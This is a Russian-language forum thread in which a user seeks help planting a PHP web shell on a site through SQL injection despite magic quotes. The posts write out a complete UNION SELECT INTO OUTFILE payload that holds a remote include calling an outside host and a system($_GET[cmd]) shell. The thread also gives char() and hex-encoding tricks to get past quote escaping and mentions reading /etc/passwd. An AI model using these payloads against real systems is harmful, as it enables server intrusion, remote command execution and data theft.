Нужна помощь при sql инъекции. Нужно залить шелл через sql инъеккцию. Но возникает одна проблема. Она состоит в том что на сервере включены магические кавычки. Вот что я пишу в адресной строке: http://mysite.ru/index.php3?mode=showcar&carid=-1+union+select+1,'<?php include ("http://mysite2/rem.php"); ?>','<?php system($_GET[cmd]);?>',4,5,6,7,8,9,10,11,12,13,14,15,16+from+mysql.user+into+outfile+'/home/www3/mysite.ru/shellka.php' Ну понятно '<?php include ("http://mysite2/rem.php"); ?>' и '<?php system($_GET[cmd]);?>' мы заменим на char(39,60,63,112,104,112,32,105,110,99,108,117,100,101,32,40,34,104,116,116,112,58,47,47,109,121,115,105,116,101,50,47,114,101,109,46,112,104,112,34,41,59,32,63,62,39) и на char(39,60,63,112,104,112,32,115,121,115,116,101,109,40,36,95,71,69,84,91,99,109,100,93,41,59,63,62,39). Здесь все понятно я просто использую функцию char. А вот например с '/home/www3/mysite.ru/shellka.php' будет посложнее. Как обработать '/home/www3/mysite.ru/shellka.php'? тоже char или нет? И чтоб залить файл на сервер надо чтоб были права на чтение и запись (777) и все?
f_s_b_37, Скорей читать таким образом нужно файл из той же директории. Не забывай, что скрипту совсем не обязательно должен быть доступен на чтение /etc/passwd Если права расставлены корректно - через скрипт не получится прочитать. Не получится ещё и в случае, если web-сервер запущен в chroot'е
"Красота - как специи, которые хорошую еду делают ещё вкуснее, а без еды есть невозможно."
АГА я смог просмотреть файл etc/passwd. 1. И кто знает какие файлы могут быть в папке etc? 2. А кто нибудь скажет как обработать '/home/www3/mysite.ru/shellka.php'?(тут вообще чар нужен или подугому надо сделать) PS на сервере стоят магические кавычки! Жду ответы на мои вопросы! Буду рад если ответите!
Используй хекс кодировку строки /home/www3/mysite.ru/shellka.php, т.е. попробуй так into+outfile+0x2F686F6D652F777777332F6D79736974652E72752F7368656C6C6B612E706870/*
Используй хекс кодировку строки /home/www3/mysite.ru/shellka.php, т.е. попробуй так into+outfile+0x2F686F6D652F777777332F6D79736974652E72752F7368656C6C6B612E706870/*
Если стоит magic_quotes_gpc, то INTO OUTFILE реализовать в любом случае не удастся, даже с помощью представления строки в виде hex
f_s_b_37 пишет: какая связь между зеркалированием спецсимволов и привилегией мускуля file_priv ? 0о
вот именно в чем связь? =) Я вообще-то про особенности INTO OUTFILE говорил, а именно хотел сказать то, что значение необходимо передавать только в кавычках.